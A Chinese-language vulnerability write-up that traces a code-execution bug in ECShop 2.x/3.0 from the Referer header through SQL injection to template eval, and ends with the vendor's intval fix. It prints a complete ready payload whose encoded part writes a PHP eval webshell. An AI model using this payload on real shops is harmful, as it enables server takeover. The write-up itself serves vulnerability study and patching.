如何進(jìn)行ECShop 2.x 3.0代碼執(zhí)行漏洞分析

今天就跟大家聊聊有關(guān)如何進(jìn)行ECShop 2.x 3.0代碼執(zhí)行漏洞分析，可能很多人都不太了解，為了讓大家更加了解，小編給大家總結(jié)了以下內(nèi)容，希望大家根據(jù)這篇文章可以有所收獲。

0x00 前言

ECShop是一款B2C獨(dú)立網(wǎng)店系統(tǒng)，適合企業(yè)及個(gè)人快速構(gòu)建個(gè)性化網(wǎng)上商店。2.x版本跟3.0版本存在代碼執(zhí)行漏洞。

0x01 漏洞原理

ECShop 沒有對 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 變量進(jìn)行驗(yàn)證，導(dǎo)致用戶可以將任意代碼插入的user_passport.dwt模板中，隨后insert_mod根據(jù)模板內(nèi)容動(dòng)態(tài)執(zhí)行相應(yīng)的函數(shù)，用戶插入惡意代碼導(dǎo)致模板動(dòng)態(tài)執(zhí)行了lib_insert下的 insert_ads 方法，通過SQL注入，返回構(gòu)造的執(zhí)行代碼，致使后面調(diào)用cls_template模板類的fetch函數(shù)，成功執(zhí)行惡意代碼。

0x02 環(huán)境搭建

IDE : PHPStorm

PHP: 5.4

ECshop 3.0

ECShop 2.7.3

0x03 分析過程

整體功能

首先過一下整體的功能，進(jìn)入到user.php中。

正常情況下，程序會(huì)將$GLOBALS[‘_SERVER’][‘HTTP_REFERER’] 賦值給了$back_act，接著通過cls_template模板類的assign和display進(jìn)行賦值和和傳值給了user_passport.dwt頁面模板；這時(shí)候user_passport.dwt頁面模板的內(nèi)容是這樣子的。

進(jìn)入到$smarty->display中，通過inser_mod的分割和反序列之后動(dòng)態(tài)調(diào)用函數(shù)獲得購物信息和會(huì)員信息，將會(huì)默認(rèn)執(zhí)行user_passport.dw上面的兩個(gè)函數(shù)，即lib_insert函數(shù)類下的insert_cart_info和insert_member_info函數(shù)。

insert_cart_info函數(shù)//調(diào)用購物信息
insert_member_info函數(shù) //調(diào)用會(huì)員信息

user_passport.dw模板：

inser_mod函數(shù)：

Payload

45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A7A4975634768774A79776E50443977614841675A585A686243676B58314250553152624D5445784D5630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/*";}

開始分析

在user.php 中的通過執(zhí)行登陸操作的時(shí)候，將$GLOBALS[‘_SERVER’][‘HTTP_REFERER’]的值修改為我們的代碼：

這時(shí)候$back_act的值就是我們篡改之后的REFERER值了，之后程序會(huì)繼續(xù)執(zhí)行：

$smarty->assign('back_act', $back_act);  //賦值
$smarty->display('user_passport.dwt'); //傳值到模板上

經(jīng)過assign，display的賦值和傳值之后，這時(shí)候user_passport.dwt模板上的back_act值是這樣的：

在觀察堆棧參數(shù)的時(shí)候，可以觀察到this->_echash 的值跟我們的Payload的值是一樣的，這是ECSHOP的固定的HASH值，2.7版本的_echash值為554fcae493e564ee0dc75bdf2ebf94ca而3.x版本的_echash值為45ea207d7a2b68c49582d2d22adf953，所以所用的Payload也不一樣。

進(jìn)入到display函數(shù)中，會(huì)執(zhí)行fetch函數(shù)，獲得頁面模板內(nèi)容；

$out = $this->fetch($filename, $cache_id); //根據(jù)$cache_id獲取模板內(nèi)容也就是user_passport.dwt的內(nèi)容

接著按照_echash的值也就是固定hash值進(jìn)行分割；

分割完之后程序會(huì)先執(zhí)行兩個(gè)默認(rèn)函數(shù)，然后才執(zhí)行我們的代碼，繼續(xù)執(zhí)行insert_mod函數(shù) 。

$k[$key] = $this->insert_mod($val);

跟進(jìn)，可以看到我們輸入的字符串根據(jù)“|”進(jìn)行了分割，并分別賦值給了$fun和$para

所以最后的到的值類似于$fun = insert_ads $para = array(‘num’=>”*/union…”,’id’=>”*/”)

到了return $fun($para);這里，將會(huì)執(zhí)行l(wèi)ib_insert動(dòng)態(tài)函數(shù)類下的 insert_ads($para)函數(shù)。

跟進(jìn)，可以看到這里執(zhí)行了SQL語句，而$arr[‘id’]和$arr[‘num’]這兩個(gè)參數(shù)正是我們傳進(jìn)來的數(shù)組中的內(nèi)容，參數(shù)可控，從而導(dǎo)致了注入。

這時(shí)候在數(shù)據(jù)庫中，執(zhí)行的語句為：

SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecshop3_0`.`ecs_ad` AS a LEFT JOIN `ecshop3_0`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time <= '1536052713' AND end_time >= '1536052713' AND a.position_id = ''/*' ORDER BY rnd LIMIT */ union select 1,0x272f2a,3,4,5,6,7,8,0x,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A7A4975634768774A79776E50443977614841675A585A686243676B58314250553152624D5445784D5630704F79412F506963702729293B2F2F7D787878,10-- -

可以看到數(shù)據(jù)庫的position_id和position_style字段分別被union select 查詢覆蓋為了'/*   和{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzIucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTExMV0pOyA/Picp'));//}xxx        

查詢結(jié)束之后,根據(jù)$position_style的值執(zhí)行了cls_template模板類的fetch函數(shù)。

$val = $GLOBALS[‘smarty’]->fetch($position_style); //執(zhí)行了smarty的fetch函數(shù)

跟進(jìn)，看到這里，這里最終執(zhí)行了惡意代碼。

$out = $this->_eval($this->fetch_str(substr($filename, 4))); //最終執(zhí)行了語句

看一下內(nèi)部的字符串處理，傳入filename的值為：

” str:{$asd’];assert(base64_decode(‘ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp’));//}xxx”

然后使用substr對filenname進(jìn)行切割，接著進(jìn)入到$this->fetch_str中，可以看到fetch_str函數(shù)的返回內(nèi)容為<?php echo xx>格式的。

在跟入到$this->get_val中，執(zhí)行了$p = $this->make_var($val);   ，跟入到make_var函數(shù)中。

字符串處理最后返回的值為：

$this->_var['asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzIucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTExMV0pOyA/Picp'));//']

拼接在一起，最后返回的數(shù)據(jù)為：

<?php echo $this->_var['asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzIucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTExMV0pOyA/Picp'));//>

從而最終導(dǎo)致了代碼執(zhí)行。

0x04 代碼執(zhí)行的調(diào)用鏈

0x05 修復(fù)方案

在ECShop3.6版本中insert_ads函數(shù)對$arr[‘num’]和$arr[‘id’]進(jìn)行了強(qiáng)制類型轉(zhuǎn)換。

$arr[‘num’] = intval($arr[‘num’]);
$arr['id'] = intval($arr['id']);

看完上述內(nèi)容，你們對如何進(jìn)行ECShop 2.x 3.0代碼執(zhí)行漏洞分析有進(jìn)一步的了解嗎？如果還想了解更多知識(shí)或者相關(guān)內(nèi)容，請關(guān)注億速云行業(yè)資訊頻道，感謝大家的支持。